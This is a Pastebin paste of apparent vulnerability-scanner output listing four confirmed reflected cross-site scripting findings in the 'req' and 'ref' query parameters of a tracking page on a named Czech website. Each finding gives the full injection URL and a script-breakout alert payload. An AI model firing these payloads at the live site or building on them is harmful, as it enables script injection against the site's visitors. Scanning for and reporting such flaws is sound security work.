Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.erovie.cz/tracking?vs=1365772963078&req='"--></style></script><script>alert(0x000497)</script>&ref=3&is404=1&cclg=cs
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: req
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000497)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.erovie.cz/tracking?vs=1365772963078&req=about:blank&ref='"--></style></script><script>alert(0x00049A)</script>&is404=1&cclg=cs
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: ref
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00049A)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.erovie.cz/tracking?vs=1365772964681&req='"--></style></script><script>alert(0x0004D8)</script>&ref=3&is404=1&breg=1&cclg=cs
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: req
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0004D8)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.erovie.cz/tracking?vs=1365772964681&req=about:blank&ref='"--></style></script><script>alert(0x0004D9)</script>&is404=1&breg=1&cclg=cs
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: ref
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0004D9)</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement